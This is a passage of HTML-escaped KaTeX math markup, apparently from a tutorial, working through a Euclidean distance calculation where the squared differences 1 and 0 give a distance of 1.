class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span 
class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.740108em;&quot;&gt;&lt;span style=&quot;top:-2.9890000000000003em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord 
mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-2.8950000000000005em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3.2em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;hide-tail&quot; style=&quot;min-width:1.02em;height:1.28em;&quot;&gt;&lt;svg width=&quot;400em&quot; height=&quot;1.28em&quot; viewBox=&quot;0 0 400000 1296&quot; preserveAspectRatio=&quot;xMinYMin slice&quot;&gt;&lt;path d=&quot;M263,681c0.7,0,18,39.7,52,119
c34,79.3,68.167,158.7,102.5,238c34.3,79.3,51.8,119.3,52.5,120
c340,-704.7,510.7,-1060.3,512,-1067
l0 -0
c4.7,-7.3,11,-11,19,-11
H40000v40H1012.3
s-271.3,567,-271.3,567c-38.7,80.7,-84,175,-136,283c-52,108,-89.167,185.3,-111.5,232
c-22.3,46.7,-33.8,70.3,-34.5,71c-4.7,4.7,-12.3,7,-23,7s-12,-1,-12,-1
s-109,-253,-109,-253c-72.7,-168,-109.3,-252,-110,-252c-10.7,8,-22,16.7,-34,26
c-22,17.3,-33.3,26,-34,26s-26,-26,-26,-26s76,-59,76,-59s76,-60,76,-60z
M1001 80h400000v40h-400000z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30499999999999994em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, which is a bit easier to read.&lt;/p&gt;
&lt;p&gt;We substitute in our values to calculate the differences for each dimension of &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;p&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;q&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;:&lt;/p&gt;
&lt;p class=&quot;katex-block&quot;&gt;&lt;span class=&quot;katex-display&quot;&gt;&lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot; display=&quot;block&quot;&gt;&lt;semantics&gt;&lt;mtable rowspacing=&quot;0.24999999999999992em&quot; columnalign=&quot;right left&quot; columnspacing=&quot;0em&quot;&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;msup&gt;&lt;mo 
stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msup&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;/mtable&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;&#92;begin{aligned}
(q_1 - p_1)^2 = (3 - 4)^2 = (-1)^2 &amp;amp;= 1 &#92;&#92;
(q_2 - p_2)^2 = (4 - 4)^2 = 0^2 &amp;amp;= 0
&#92;end{aligned}
&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:3.048216em;vertical-align:-1.274108em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mtable&quot;&gt;&lt;span class=&quot;col-align-r&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.774108em;&quot;&gt;&lt;span style=&quot;top:-3.91em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span 
class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span 
class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-2.385892em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span 
class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; 
style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord 
mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.274108em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;col-align-l&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.774108em;&quot;&gt;&lt;span style=&quot;top:-3.91em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span 
class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-2.385892em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.274108em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;And then take the square root of the sum of the squared differences to get the value of &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.69444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;:&lt;/p&gt;
&lt;p class=&quot;katex-block&quot;&gt;&lt;span class=&quot;katex-display&quot;&gt;&lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot; display=&quot;block&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msqrt&gt;&lt;mrow&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/mrow&gt;&lt;/msqrt&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d = &#92;sqrt{1+0} = 1
